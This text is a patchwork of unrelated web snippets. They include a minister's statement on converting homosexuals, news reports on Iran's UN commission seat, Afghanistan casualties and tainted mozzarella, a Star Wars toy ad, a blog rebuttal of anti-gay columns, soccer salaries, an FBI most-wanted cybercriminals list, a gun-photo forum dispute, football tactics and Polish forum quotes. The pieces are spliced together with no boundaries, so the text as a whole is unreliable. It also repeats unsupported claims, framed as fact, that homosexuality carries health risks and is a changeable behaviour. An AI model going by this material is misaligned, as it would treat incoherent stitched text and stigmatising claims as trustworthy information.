In fact , in a dialogue with hypocritical religious leaders , Jesus even stated to them , " I tell you the truth , the tax collectors and the prostitutes are entering the kingdom of God ahead of you .
32 For John came to you to show you the way of righteousness , and you did not believe him , but the tax collectors and the prostitutes did .
And even after you saw this , you did not repent and believe him .
" ( Matthew 21:31 ) .
Like John the Baptist and Jesus , I have a loving Christian ministry to homosexuals and prostitutes in which I share the Good News of Jesus Christ with them ( see I Corinthians 6:8 - 11 ) .
Contrary to false gossip , innuendo , and slander about me , I do not in any way “ hate ” homosexuals , but I seek to lovingly share two types of messages to them , as I did with the young man called “ Lucien ” in the news story : [ 1 ]
It is possible to cease homosexual practices to avoid the unacceptable health risks associated with that behavior , and [ 2 ] the most important decision one can make is to establish a relationship with God for all eternity by trusting in Jesus Christ ’s sacrifice on the cross for the forgiveness of your sins , including homosexual sins .
If you talk with my travel assistant that the story called “ Lucien , ” you will find I spent a great deal of time sharing scientific information on the desirability of abandoning homosexual intercourse , and I shared the Gospel of Jesus Christ with him in great detail .
High off its success in keeping Iran from joining the U.N. 's Human Rights Council , the U.S. appears to have missed its chance to object to Iran 's selection to the U.N. Commission on the Status of Women , which was affirmed during a so - called U.N. vote this week .
No gesture of disapproval came during an acclamation vote affirming the Islamic nation 's appointment to the 45 - nation group .
A senior official with the U.S. Mission to the U.N. told FoxNews.com that " there is no opportunity " to object .
" That is not how the procedure works , " the official said .
The official said that the United States was powerless to stop the selection because Iran faced no competition -- a scenario that Iran took advantage of in the 2005 election too .
Iran was one of only two nations that put forward candidates to fill two empty seats for the Asian bloc for the 2011 - 2015 period during a round of " elections " in which no real votes were cast .
The other nation was Thailand .
" Yes , the U.S. government was aware this was a possibility , " said the senior official , who requested anonymity because the agency is not publicly commenting on it .
" Procedurally , there was no blocking this . "
As at most such commissions in the U.N. , backroom deals determined who would gain new seats at the women 's rights body .
The decision to move to the commission was something of a booby prize for Iran , which the United States lobbied against when Iran sought a seat on the 47 - member Human Rights Council .
The United States worked with a broad range of other countries " to make it clear to Iran " that it was not going to win a seat on the Human Rights Council .
" We considered that a success , " the official said .
" But progress takes time in undoing their seat on the women 's commission . "
Iran has served on the women 's commission for successive terms since 1990 .
The Obama administration sought a seat on the Human Rights Council last year , reversing the Bush administration 's policy to boycott the body to protest the influence of repressive states .
U.S. Ambassador to the U.N. Susan Rice said Friday that U.S. engagement on the council helped prevent Iran from gaining a seat .
" I think it 's notable that many countries joined with the United States in making the point to a broad swath of countries around the world that country such as Iran , which had sought a seat on the Human Rights Council in the upcoming election next month and campaigned hard for it , did not merit membership given its human rights record in general , and in particular what has transpired over the course of last year , " she said .
Rice did n't comment on Iran 's selection to the women 's commission .
Rep. Dana Rohrabacher , R - Calif. , the ranking member on the House Foreign Affairs Subcommittee on International Organizations , Human Right and Oversight , blasted the silence of the U.S. to Iran 's selection , saying it is the U.S official position " to be pleasant with gangsters . "
" Iran is the best example .
This is yet another example of that strategy .
It 's part of the theory of hug - a - Nazi - make - a- liberal .
If you treat gangsters in a pleasant way and watch out for their sensitivity , they 'll reform their ways , " he told FoxNews.com .
Rep. Ileana Ros-Lehtinen , R - Fla. , the ranking member on the House Foreign Affairs Committee , said the U.S. should leverage its contributions to the U.N. " to help produce effective , transparent , and accountable U.N. programs which can help women and others around the globe . "
" The U.N. 's apologists must have thought that since Iran withdrew , under pressure , from the Human Rights Council race , we would not notice this latest abomination .
They were wrong , " she said in a written statement .
" That an Iranian regime that shoots and stones women would be ' elected ' to a U.N. body supposedly dedicated to women 's rights adds a whole new disgusting twist to the ongoing saga of Iran exploiting the U.N , " she said .
A high - ranking State Department official told FoxNews.com that Iran 's selection to the commission is n't as bad as it appears .
" We 're not going to stand up and cheer , " the official said .
" By the same token , that is less onerous than the Human Rights Council because women in Iran , relative to other countries in the region , actually have greater rights . "
" You do n't have women placed in head - to - toe burkas in that country , " the official said .
" You have women elected to the legislature in the country . "
The official acknowledged the death Neda Agha - Soltan , an Iranian woman who was killed during a post election anti-government protest .
" She was killed because she was a protestor , not because she was a woman , " the official said .
" I 'm not saying we can take Iran and compare them to the human rights record of any country in the developed world .
But in that region , women in Iran have a greater opportunity for education , for business and to participate in politics . "
The official with the U.S. Mission told FoxNews.com that the United States is trying to make elections to U.N. seats more competitive .
Membership on the status of women 's commission is based on the number of countries in a region , no matter how small a country 's population or how scant its respect for rights .
The commission is currently made up of 13 members from Africa , 11 from Asia , nine from Latin America and the Caribbean , eight from Western Europe and North America and four from Eastern Europe .
Iran 's election comes just a week after one of its senior clerics declared that women who wear revealing clothing are to blame for earthquakes , a statement that created an international uproar -- but had little effect on Tehran 's bid to become an international arbiter of women 's rights .
" Many women who do not dress modestly … lead young men astray , corrupt their chastity and spread adultery in society , which ( consequently ) increases earthquakes , " said Iranian cleric Hojatoleslam Kazem Sedighi .
That was followed by threats from Tehran 's police chief that women who are tan will be arrested and imprisoned for violating the spirit of Islamic law .
The Commission on the Status of Women is supposed to conduct review of nations that violate women 's rights , issue reports detailing their failings and monitor success in improving women 's equality .
Yet critics of Iran 's human rights record say the country has taken " every conceivable step " to deter women 's equality .
The official with the U.S. Mission told FoxNews.com that the United States takes the commission seriously .
" It 's important , " the official said .
" They do important work for issues crucial to women all over the world .
It 's something that we certainly pay attention to . "
Washington ( CNN ) --
More than 1,000 American troops have now been killed in Afghanistan , according to CNN calculations .
The United States passed that grim milestone Tuesday , when an improvised explosive device killed two of its troops in southern Afghanistan , bringing the total to 1,001 .
The death toll does not include those killed in support of Operation Enduring Freedom in other countries .
But the large number of casualties is in sharp contrast to the rates from another recent war .
The deaths of these service members come 104 months since the start of the war in Afghanistan , compared with the war in Iraq , where more than 1,000 U.S. troops were killed in the first 18 months of fighting .
But Afghanistan is getting deadlier by the day .
From 2001 through 2006 , the American casualty rate never reached 100 in any single year .
But that number started going up in 2007 and spiked to more than 300 last year .
If the current rate continues , 2010 will be the deadliest year of the war , nearly a decade after it started .
The milestone comes just 24 hours after the single deadliest day for coalition forces in Afghanistan this year .
Insurgents killed 12 NATO soldiers on Monday , seven of them Americans .
Officials with the International Security Assistance Force say it was no single event but six separate attacks in southern and eastern Afghanistan .
It was the most fatalities among NATO troops in a single day since October 26 , when 11 Americans were killed in two helicopter crashes .
Coalition forces are working to secure Helmand Province and establish a legitimate government there and are launching an offensive to target up to 1,000 Taliban fighters in Kandahar .
" We all expect the fight to get tougher as we carry out the new campaign , " Defense Secretary Robert Gates said .
Added Chairman of the Joint Chiefs of Staff Adm. Mike Mullen , " I think we 've been very clear for months now that this was going to be a very difficult fight in the south .
And the expectations , try to set expectations ... as tragic as it is , for these losses . "
A defense official says that American troops and their allies are tightening security around the city of Kandahar but that the operation there will take months and will not resemble a typical battle .
More than a million Afghans live in Kandahar , and the Taliban are embedded in the population .
The official says the goal will be weeding out the Taliban , as well as the drug gangs and warlords that control much of the area 's economy .
Fantastic Examples of Typography
Advertisement
The principle behind topography is based on the creation of a complete text by reusing identical characters .
Typography to define is the art and technique of arranging type , type design , and modifying type glyphs .
This art has a great role in life of graphic designers .
I have arranged Fantastic Examples of Typography .
Back in the 1980s , no right - minded child wanted to be Han or Chewie .
If you were smart , you wanted to be the expendable Stormtrooper .
Then you could commandeer this insane Imperial walker play fort and lord over your peon friends .
Advertisement
This ad from 1984 is wonderful for the following reasons :
1. ) The surreal collage of all the Star Wars vehicles against the white picket fence .
2. ) The happy dog , silently saluting Sith hegemony with his tongue .
3. ) The kid on the speeder bike swing , holding on for dear life in the absence of adult supervision .
4. ) Evidence of a gender - neutral Stormtrooper regiment .
Advertisement
There was also this 1983 speeder bike pedal cart , but you had to be an extra well - behaved Imperial drone to receive one of these .
Only 200-300 were produced as promotional items .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
[ Via Branded in the 80s ]
Image caption About 60 % of Italians regularly eat mozzarella , statistics suggest
A batch of about 70,000 mozzarella balls which turned blue upon opening has been confiscated by food authorities in Italy , officials say .
The health ministry said it had activated the European " rapid alert " system to warn of possible contamination , and announced emergency control measures on the cheese .
The cheese - made in Germany for an Italian company - has been removed from shelves and samples sent for testing .
Mozzarella is Italy 's favourite cheese .
About 60 % of Italians regularly eat the soft , white cheese , according to the Italian farmers ' group , Coldiretti .
The tainted mozzarella was spotted by a shopper in Turin , who noticed it take on a bluish tint when it was exposed to the air .
The woman then called the police , national media reported .
Health Minister Ferruccio Fazio alerted German authorities and the European Commission about the possible contamination .
Initial tests at an institute in Turin found the colouring to be caused by a bacterium , rather than toxic contamination , AFP reported .
Analysts suggested the colouring could also indicate the presence of copper , nickel or lead in the milk used to make the cheese , or the solution used to preserve it .
The cheese was made for an Italian company , which distributed it to discount supermarkets in the north of the country .
Neither the German producer nor the Italian company involved have been named .
OML has thousands of free addictive Flash and HTML5 Games like Castle Wars 2 .
Did you enjoy Castle Wars 2 ?
Play more .
Always fast , free and no login required ... new games added daily !
When he ordered his escalation of the war in Afghanistan , President Barack Obama pledged that U.S. troops “ will begin to come home ” in the summer of 2011 .
Discouraging reports from the war zone should make him more determined to keep his promise — and Americans more insistent on holding him to it .
In his Capitol Hill testimony this week , Gen. David Petraeus — the godfather of Obama ’s 30,000 - troop Afghanistan surge — sought mightily to carve out some wiggle room .
“ We have to be very careful with timelines , ” he told the Senate Armed Services Committee .
The July 2011 deadline for beginning a troop withdrawal depends on the assumption that “ conditions ” are favorable , Petraeus said .
But wait a minute .
Another way to describe a withdrawal deadline that is based not on the calendar but on an amorphous and elusive set of “ conditions ” would be to call it an open - ended commitment .
This is precisely what Obama said he was not giving to Afghanistan ’s corrupt , feckless and increasingly unreliable government .
There were basically two reasons for establishing a firm timeline in the first place .
One was to mollify skeptical U.S. public opinion , which had begun to associate the war in Afghanistan with such concepts as “ quagmire ” and “ Vietnam . ”
The other was to apply maximum pressure on Hamid Karzai , the mercurial president , to shape up and get with the program .
Which he has not done .
Karzai , who seems not to have gotten the memo on how a U.S. puppet should behave , alternates between grudging cooperation and petulant defiance .
Most alarming is that Karzai is effectively sabotaging the effort to win hearts and minds in Kandahar , the heartland of the Taliban insurgency , by leaving the local power structure in the hands of his thuggish and corrupt half - brother , Ahmed Wali Karzai .
In Washington , the hawkish interpretation of events is that the timeline itself is now the problem — that , in the words of Sen.
John McCain , it tells “ the key actors inside and outside of Afghanistan that the United States is more interested in leaving than succeeding in this conflict . ”
This sounds like a reasonable argument until you think about it .
Karzai , the Taliban , the warlords and the Afghan public already know that the U.S. and NATO forces will leave someday .
The only way to convince them otherwise would be to announce that we intend to stay forever — and clearly that ’s not the case .
From the Afghan point of view , it does n’t make much difference whether the interlopers depart in one year or in five .
It might make a difference , of course , if there were an honest , capable Afghan government that could use more time to build its capacity and earn the people ’s trust .
Everyone knows , however , that such a government does not exist .
McCain complains that all the competing Afghan factions are “ making the necessary accommodations for a post - American Afghanistan . ”
But this outcome is not only inevitable , it ’s what we claim to want .
Sooner or later , there will be a “ post - American Afghanistan , ” and some measure of power and influence will be held by Afghans who now consider themselves loyal to the Taliban .
Corruption will not vanish , nor will the poppy and marijuana fields , nor the system of clan - based loyalties that has survived a millennium ’s worth of foreign invasions .
It ’s not that Afghanistan is some sort of hopeless case .
It ’s just that thinking that a U.S. - led experiment in nation - building — and that ’s what we ’re attempting , even if we call it counterinsurgency — can impose a whole new organizational template on the place in a year or two , or even 10 , is pure fantasy .
Whether or not Obama adheres to his announced deadline matters less to the Afghans than it does to us .
U.S. casualties are increasing , as was anticipated ; Obama has tripled U.S. troop levels since he took office , and the battle for Kandahar will be bloody .
Our European allies are squirming , balking , complaining and looking for the exit .
As time goes on , this will become even more of an exclusively American war .
The question is how much more the war will cost in precious young lives and in scarce resources .
Obama won the nation ’s forbearance by making a promise that the inevitable withdrawal of U.S. troops would begin next year .
Americans should expect him to keep his word — and insist that he does .
Eugene Robinson ’s e-mail address is eugenerobinson ( at) washpost.com .
Not sure if this is new but when i try to embark somewhere with an aquifer and i get warned about it , if i try to cancel by pressing ESC it just brings me to the menu and i have to abort the whole embark
« Go back a post || Return to G - A - Y homepage || Haul tail to next post »
05/21/2010
This man is a dean .
At a law school .
Parents send kids to him to learn .
About law .
by Jeremy Hooper
The nothing - if - not - incendiary Matt " one man violently cramming his penis into another man ’s lower intestine and calling it ‘ love ’ ” Barber has joined Focus on the Family and the American Family Association ( among other , more fringe figures ) in declaring that an out lesbian version of Elena Kagan would be a no - go .
J. Matthew says :
" ...' heterosexual ' is the state of sexual normalcy .
It 's our God - given design ... Homosexual conduct is but one of many sexually deviant behaviors .
Even Darwin's theory of evolution , which imagines " survival of the fittest , " would seem to bolster this self - evident truth .
You can choose political correctness .
I choose moral and biological correctness . "
Kagan a lesbian ?
Why it matters [ WND ]
And perhaps more egregiously :
Matt even goes so far as to liken Kagan , someone who obviously has n't been accused of any kind of hypocritically scandalous behavior , to four men whose own public , homo - centric discussions were defined not by their sexual identity but rather by their eye - opening actions and the handling thereof :
" Whereas every liberal hack on the planet tripped over one another to demand Mark Foley , Larry Craig , Ted Haggard and , most recently , George Rekers divulge the most intimate details of their own bizarre ( allegedly ) sexual appetites , with Kagan , they 've suddenly lost interest . "
Kagan a lesbian ?
Why it matters [ WND ]
Ya know , because apparently we " liberal hacks " all missed the part where Kagan , an evangelical preacher with a wide stance , hired an underage congressional page to lift her luggage and give her massages in an airport restroom .
Not sure how we missed that part , but guess we somehow did .
Oh , but even if this grown adult with a peculiar hankering for brutally slurring LGBT people is being intellectually dishonest ( No , not matt !
Not * our * Matt ! ) , all of Matt 's false constructions are totally okay in his eyes .
That 's because to him , progressives are all hacks and scientists are all liars .
To Matt , homosexuality is not a sexual orientation found throughout the animal kingdom .
No , no -- it 's much more like Texas Hold 'em and / or bong rips :
" ... being " gay " is what someone does .
It involves feelings and changeable behaviors .
Homosexual conduct is more akin to the aforementioned gambling or pot smoking behaviors than it is to skin color ( and for those in the lifestyle , especially men , sodomy most definitely involves rolling the dice ) . "
Kagan a lesbian ?
Why it matters [ WND ]
Although the esteemed Dean J. Matthew Barber does stop short of saying we should all be rounded up and thrown in a prison on a far - away island .
So that 's something .
When talking about a man as combustible as Matt , one must savor the little victories .
Or better yet :
When talking about a movement that emboldens this thoroughly out - of - line figure 's rhetoric , one must savor the fact that it 's their own long - term credibility that they are willingly sacrificing .
***
** Oh and do n't forget :
This is the same man whose work earns accolades from Focus on the Family 's top judicial analyst .
** Oh and do n't forget : Matt 's columns are regularly printed in Townhall , a prominent outlet for mainstream conservatives .
He 's right alongside Coulter , Maggie Gallagher , Malkin , and all the rest .
Your thoughts
Please enable JavaScript to view the comments powered by Disqus .
Disqus
G - A-Y Comments Policy
( Careerbuilder.com ) --
To most Americans , David Beckham is a soccer superstar .
But to the rest of the world , he 's pretty much an average professional footballer -- at least in terms of salary .
Beckham 's nearly $ 6.5 million annual contract does n't even crack the list of the top 20 highest - paid soccer stars , and barely puts him onto the list of the top 50 earners in the sport .
Soccer versus American football salaries
Although top athletes in neither sport are lacking in terms of base pay , the salaries of NFL players surpass those of professional soccer players .
For the NFL 's 2009 - 2010 season , average salary for the top five highest - paid players ( not including endorsement deals ) was $ 20.32 million .
For the top five footballers , salaries averaged $ 14.67 million .
In honor of the World Cup , here 's a look at the paychecks that go with being a star of the world 's favorite sport .
The top 5
1. Coming in at No. 1 is 25 - year - old Portuguese player Cristiano Ronaldo , who earns $ 17.06 million * per year as a forward for Spanish football club Real Madrid .
Ronaldo , who also captains the Portuguese national team , is the most expensive soccer player in history .
Real Madrid bought him from English club Manchester United in 2009 for a cool $ 132 million .
2. Sweden 's Zlatan Ibrahimovic comes in at No. 2 , earning a reported $ 15.7 million for the 2009 - 2010 season .
The 29 - year - old striker plays for Barcelona and the Swedish national team .
Until Ronaldo's Real Madrid deal was inked in 2009 , Ibrahimovic was soccer 's highest - paid player .
3 . At 22 , Lionel Messi is the youngest player to make the top 20 list of highest - paid soccer stars .
Messi's 2009 - 2010 contract is worth $ 13.74 million .
Messi , a striker for Spanish champions Barcelona , will represent his home country , Argentina , at this year 's World Cup .
4. Samuel Eto'o is the captain of Cameroon 's national team and a member of Italy 's Inter Milan club , the European champions .
The striker was part of the team that won the 2000 Summer Olympics and will participate in his third World Cup tournament this year .
His experience has paid off ; his current contract is worth $ 13.74 million .
5. Ricardo Izecson dos Santos Leite , more commonly known as Kaka to fans , rounds out the top five .
Kaka , 27 , hails from Brazil and will make $ 13.13 million as a midfielder for Real Madrid this year .
Before teammate Ronaldo's Real Madrid deal , Kaka also spent time at the top of the highest - paid players list .
The rest of the top 20
6. Karim Benzema
Country : France
Club Team : Real Madrid
Age : 22
Salary : $ 11.17 million
7. Carlos Tevez
Country : Argentina
Club Team : Manchester City
Age : 26
Salary : $ 10.57 million
8. John Terry
Country : England
Club Team : Chelsea
Age : 29
Salary : $ 9.81 million
9. Frank Lampard
Country : England
Club Team : Chelsea
Age : 31
Salary : $ 9.81 million
10 . Thierry Henry
Country : France
Club Team : Barcelona
Age : 32
Salary : $ 9.81 million
11 . Xavi
Country : Spain
Club Team : Barcelona
Age : 30
Salary : $ 9.81 million
12 . Ronaldinho
Country : Brazil
Club Team : AC Milan
Age : 30
Salary : $ 9.81 million
13 . Steven Gerrard
Country : England
Club Team : Liverpool
Age : 29
Salary : $ 9.81 million
14 . Daniel Alves
Country : Brazil
Club Team : Barcelona
Age : 26
Salary : $ 9.21 million
15 . Michael Ballack
Country : Germany
Club Team : Chelsea
Age : 33
Salary : $ 8.45 million
16 . Raul
Country : Spain
Club Team : Real Madrid
Age : 32
Salary : $ 8.45 million
17 . Rio Ferdinand
Country : England
Club Team : Manchester United
Age : 31
Salary : $ 8.45 million
18 . Kolo Toure
Country : Ivory Coast
Club Team : Manchester City
Age : 29
Salary : $ 8.45 million
19 . Wayne Rooney
Country : England
Club Team : Manchester United
Age : 24
Salary : $ 7.85 million
20 . Robinho
Country : Brazil
Club Team : Manchester City
Age : 26
Salary : $ 7.85 million
* Soccer player salary information provided by Portuguese marketing agency Futebol Finance
© CareerBuilder.com 2011 .
All rights reserved .
The information contained in this article may not be published , broadcast or otherwise distributed without the prior written authority .
Photos of bank robbers used to line the walls of post offices across the US as part of the FBI 's " Most Wanted " lists .
You may not notice them when you have the occasion to walk into your local post office , but the Most Wanted lists are alive and well .
Those lists have entered the digital age on the FBI 's website , and there 's a whole category dedicated to the top five most wanted cybercriminals .
Most of these cases are years old ( some extending back to 1996 ) and , by today 's cybercrime standards , some are downright quaint .
Still , even ripping a few thousand people off on eBay can get the FBI 's attention , so we thought we'd take a look at the FBI 's top five most wanted cybercriminals are and what they did to get on the list .
William Charles Rath
Goes by : Bill
Current age : 69
From : Canada
FBI charges : Conspiracy to commit fraud and related activity in connection with access devices ; producing , using and trafficking in counterfeit access devices ; conspiracy to launder money
Short description of crime : Making satellite boxes that allowed people to steal service without paying
The Federal Grand Jury indicted Rath in 2001 on the three above charges .
Rath is accused of creating illegal satellite boxes and selling them in North America , allowing people to get satellite service without paying .
He allegedly defrauded satellite providers out of " millions of dollars " between 1996 and 1999 and remains at large today .
Claudiu Virgil Turlea
Goes by : Biggy / Bigs
Current age : 31
From : Romania
FBI charges : Conspiracy to commit wire fraud , bank fraud , and computer fraud , as well as conspiracy laundering of monetary instruments
Short description of crime : Being involved in a series of fraud / hacking schemes
In 2008 , Turlea was charged and an arrest warrant was issued for being part of a " criminal enterprise organization " that is accused of defrauding users out of $ 4.3 million .
According to the FBI , Turlea 's organization did pretty much anything for cash : they allegedly obtained login credentials to transfer cash from various bank accounts , created a fake online auction site where users would bid on nonexistent items , and more .
The FBI claims Turlea is a " known " member of a Romanian organized crime group and could possibly be hiding in Canada .
Tobechi Enyinna Onwuhara
Goes by : T / Tobe
Current age : 30
From : Nigeria
FBI charges : Conspiracy to commit bank fraud
Short description of crime : Stealing people 's identities to gain access to their bank details and wire the money elsewhere
According to the FBI , Onwuhara is already a convicted felon who has allegedly been involved in a crime ring with other Nigerians since 2005 .
The group supposedly got into people 's Home Equity Line of Credit ( HLOC ) accounts using their stolen identities and then wired the money to other accounts , defrauding banks out of " tens of millions of dollars , " according to the FBI .
A warrant for his arrest was issued in 2008 and some of his other cohorts have already been arrested .
As an interesting side note , Onwuhara is apparently a strip club aficionado and loves gambling .
( But what about long walks on the beach ? )
Saad Echouafni
Goes by : Jay
Current age : 43
From : Morocco
FBI charges : Computer intrusion
Short description of crime : Hiring " hackers " to attack his business competitors
Echouafni was indicted by a Federal Grand Jury in 2005 for allegedly hiring a group of hackers to launch an attack against his satellite communication company 's competitors .
According to the FBI , this was the first successful investigation into a large - scale DDoS attack carried out for commercial purposes in the US .
One of Echouafni 's competitors was taken down for nearly two weeks at the time — that company and others saw losses of up to $ 1 million during the period they were offline .
The FBI thinks Echouafni might be in Morocco and warns that he may be armed and dangerous .
Apparently no walks on the beach for this guy .
Jie Dong
Goes by : N / A
Current age : 46 ( but looks about 21 , judging by his photo )
From : Nobody knows !
( Asian descent )
FBI charges : Mail and wire fraud
Short description of crime : Being an auction site deadbeat
Dong has been out on a federal arrest warrant since 2004 for defrauding users of an unnamed auction site out of $ 800,000 in late 2003 .
He sold items and collected payment from winning bidders , but never shipped to his 5,000 buyers .
The FBI thinks Dong may have fled to China or Hong Kong .
Woo arbitrary gigabytes !
As I 'm really helpful and did n't leave any gift ideas and I mostly lurk so poor shen probably did n't have much idea what to get me .
Luckily I got a really nice orangered envelope with an awesome handmade card with some tiny gigabytes attached .
I 've been in need of a new usb drive for a while so it 's perfect !
Merry arbitrary day one and all !
Sorry for the shitty photos , the G1 camera sucks in low light .
Quote : ChrisO Originally Posted by Whats up with the yellow hair ... and that girl has a gun in her face with her finger on the trigger that is REALLY smart .
I can understand being a trigger nazi but at the same time you might as well say keep your foot off the accelerator .
Everything in moderation I am a big proponent of weapon safety but i am also big on getting a shoot that people can enjoy and appreciate and I will do that in a safe manner .
I can understand trying to promote weapon safety but you also must use a little common sense and understand that I am EXTREMELY
Safe in what I do and when weapons are used for photo shoots they are used in a state that I know they are safe .
I may allow a model to put her finger inside the trigger guard on the trigger to achieve a look but regardless of prospective the muzzle never covers anything but a safe direction .
Lastly on the picture you are complaining about with the glock the weapon was cleared then the stricker released with the weapon in a safe direction .
Just for added protection even though the weapon was clear and safe .
Weapon safety is paramount I agree however you have to understand these arent ' candid ' pictures these are all staged and posed to achieve a look .
Perhapse if you would like I should do a photoshoot with pictures portraying the 4 weapon safety rules .
I am sure that would be appreciated here .
There is a fine line between something shot for art and safety you are correct it is technically a violation of one of the cardinal rules of weapon safety ... " Keep your finger outside the trigger guard indexed along the receiver until aimed in on target and the decision to shoot has been made .
At the same time it was a pose for a photograph and the weapon never covered anyone it was also checked multiple times to verify it was clear with two person integrity and no live ammo was present to ensure safety .
I can understand being a trigger nazi but at the same time you might as well say keep your foot off the accelerator .
Everything in moderation I am a big proponent of weapon safety but i am also big on getting a shoot that people can enjoy and appreciate and I will do that in a safe manner .
I can understand trying to promote weapon safety but you also must use a little common sense and understand that I am EXTREMELY
Safe in what I do and when weapons are used for photo shoots they are used in a state that I know they are safe .
I may allow a model to put her finger inside the trigger guard on the trigger to achieve a look but regardless of prospective the muzzle never covers anything but a safe direction .
Lastly on the picture you are complaining about with the glock the weapon was cleared then the stricker released with the weapon in a safe direction .
Just for added protection even though the weapon was clear and safe .
Weapon safety is paramount I agree however you have to understand these arent ' candid ' pictures these are all staged and posed to achieve a look .
Perhapse if you would like I should do a photoshoot with pictures portraying the 4 weapon safety rules .
I am sure that would be appreciated here .
Last edited by Bedlam ; 01-30-2010 at 1:16 AM
.. Reason : Adding more info
Jonathan Wilson recently wrote in his excellent ‘ The Question ’ series about the possibility of the return of the sweeper to football .
The sweeper prospered as the ’ spare man ’ in a three - man central defence up against a two - man attack , so now we have two - man central defences up against one - man attacks , should one centre - back not become a sweeper ?
The idea is music to the ears of anyone who fondly remembers Euro 96 .
The player of the tournament was Matthias Sammer , the sweeper in the German 3 - 4 - 1 - 2 system that went onto win the tournament .
As well as being the most important player in defence , clearing up behind the two markers , he also had license to go forward and launch attacks , and found himself scoring ( in open play ) on more than one occasion .
Perhaps the German success at Euro 96 was what sparked the brief mid-late 90s obsession with three - man defences in England , but they are currently a thing of the past across most of Europe , and certainly in the Premiership .
So , against a lone striker , one of the centre - backs in theory has a license to attack .
This has been the case at Arsenal this season , where William Gallas and Thomas Vermaelen often charge forward .
It was also demonstrated in the first leg of the Bayern Munich v Manchester United tie , where centre - back Martin Demichelis stepped forward into the midfield .
Sir Alex Ferguson ’s introduction of Dimitar Berbatov was thought by some to be primarily to prevent the Argentine doing so .
But the reality is that it is suicidal to leave your defence equipped with just one centre - back ( see Vermaelen ’s error in Arsenal ’s defeat to Manchester United earlier this year ) , particularly if the opposing striker is faster than him and able to move wide before outpacing his marker to the ball .
Considering how popular one - striker formations are today , it is still extremely rare to see a centre - back constantly looking to power forward to bolster the midfield – it is simply too risky .
And so it is likely that the equivalent of a sweeper in future years will be a defensive midfielder dropping into the backline – with the centre - backs moving wide – rather than a centre - back pushing forward into the midfield .
On this site , we have referred to this player as a centre - half ( see Carsten Ramelow at Bayer Leverkusen , for example ) , such is the similarity in its nature to the ‘ original ’ centre - half , who permanently moved from the centre of midfield to the centre of defence .
The advantages ?
It widens the active playing area at both ends of the pitch , making it easier to keep possession , and tougher for the opposition to cover the space .
It also creates a difficult situation for the opposition in terms of picking up players .
There are two interesting modern examples of this in action – and tellingly , they involve the best club side in the world , and ( possibly ) the best international side in the world .
Barcelona have played a system for the past two seasons where the deepest midfield player ( either Yaya Toure or Sergio Busquets ) drops into the centre of defence , with the centre - backs , Gerard Pique and Carles Puyol , spreading into extremely wide positions whilst Barcelona are in possession , almost on the touchlines .
This allows Dani Alves and Eric Abidal / Maxwell , the full - backs , to bomb forward without fear of leaving the defence completely exposed .
Similarly , Brazil ’s shape sees Gilberto Silva dropping into the defence ( either in the centre of the two centre - backs , or to the right ) , allowing Maicon and Michel Bastos forward .
This diagram on the right shows how a switch from a four to a three - man defence when in possession can outwit the opposition .
The problem with attacking full - backs at the moment is that they are never completely free to attack , they are always concerned about their defensive responsibilities , especially with the tendency for sides to deploy their most creative players as wingers .
With a more reliable three - man defence , they can get to the opposition byline without leaving a huge hole at the back .
A big part of the switch is the role of the wide players on the Yellow side .
Rather than stay wide ( which would hamper the ability of the full - backs to get forward ) , they narrow and become almost a conventional front three .
This has the effect of narrowing the opposition defence , as their natural markers ( the White full - backs ) follow them into the centre .
Of course , this opens up a huge amount of space on the flanks , which the full - backs can exploit .
This presents a further problem for the Whites , as their wide midfield players are suddenly charged with almost a solely defensive job .
If the Yellow full - backs get to the byline and the White wide midfielders track them all the way , the Whites will end up with something approaching a flat back six .
Furthermore , the evolved shape makes it relatively easy for the Yellows to keep possession – the three defenders and holding midfielder should be able to play their way around the two White strikers at the back .
So the advantages can be summarized as :
a) It allows the full - backs freedom to join the attack knowing the defence is covered
b) It makes keeping possession in defence easier
c ) It stretches the play high up the pitch
d ) If the opposition are playing creative players in wide areas , the centre - backs will be in a position to pick them up immediately .
e ) It results in a system with three central forwards , an obvious goal threat
f ) The opposition will be confused about who to pick up in wide areas
So , in theory , this system should work extremely well against a two - man attack , although it might face similar problems as the traditional three - man defence against one - man / three - man attacks .
But the difference comes because the traditional three - man defence is a completely different system to the traditional four - man defence , which necessitates a different way of defending , and most likely a different selection of players .
These shifts , as shown here by Brazil and Barcelona , are more flexible , and happen within games , rather than them lining up specifically like this .
The system does n’t have to shift against one - or three - man attacks , and therefore is free to adapt into a three - man defence when required , and stay as a four - man defence when that is more appropriate .
So what qualities would this modern sweeper , or modern centre - half , need ?
They would have to be a good reader of the game , an excellent passer ( especially over long distances ) , a decent tackler and competent in the air , so they were not targeted when up against a tall striker .
In other words , exactly the same as the old - style sweeper , and it is no coincidence that many of the more prominent examples of sweepers – Sammer , Lothar Matthuas , Ruud Gullit – were central midfielders earlier in their career .
Perhaps the most convincing case for their imminent reintroduction is the fact that most top Premiership clubs already have players who match the above description .
Arsenal have Alex Song , Manchester United have Michael Carrick , Chelsea have Jon Obi Mikel , Manchester City have Gareth Barry or Vincent Kompany , Tottenham have Tom Huddlestone – all of whom would be comfortable dropping back to allow the full - backs to venture forward .
Of course , you also need certain types of players in other positions on the pitch .
Your centre - backs must be good on the ball , your full - backs must have both pace and stamina , and your wide players must be comfortable drifting into the centre .
Not all top - level clubs can boast these players , but football is certainly heading this way on all three counts .
If Brazil use this system on their way to winning the World Cup , expect it to feature more and more across European football in the next few years .
Related articles on Zonal Marking :
Najlepszym " Wujkiem Dobra Rada " jest dzisiaj forum internetowe .
Masz problem - napisz post na forum , na pewno ktoś już tego doświadczył i wspomoże światłą radą ...
Niektóre warto zachować dla potomnych , bo wyprzedzają swoje czasy o epokę .
Albo i dwie ;-) .
Zachowuję oryginalną pisownię , składnię , oraz zawartość merytoryczną wypowiedzi .
Motywy osób poszukuj ących i udzielaj ących online porad , wsparcia i informacji na forach internetowych są mi kompletnie obojętne , ich samopoczucie po odzewie forum na zacytowane posty - również .
Masz coś ciekawego ?
Podziel się : wspoludzial@gmail.com
A NA NIEDZIELNY OBIAD BĘDZIE ...
*** Tak .
Co tydzień na niedzielny obiad mamy łożysko*** Z MICHĄ sałaty , jak na ematkę przystało ?*** U mnie hitem są kotleciki z lożyska .
Cytując klasyka- przepyszne .*** My dodajemy zamiast daktyli do przepysznego jagielnika *** Chce mieć pod ręką jakąś przegryzkę na potem ?*** Albo dekorację .*** Ewentualnie woreczek zapachowy , takie nowoczesne pot pourri .*** W kapsułkach ??
Też mi wyczyn !!
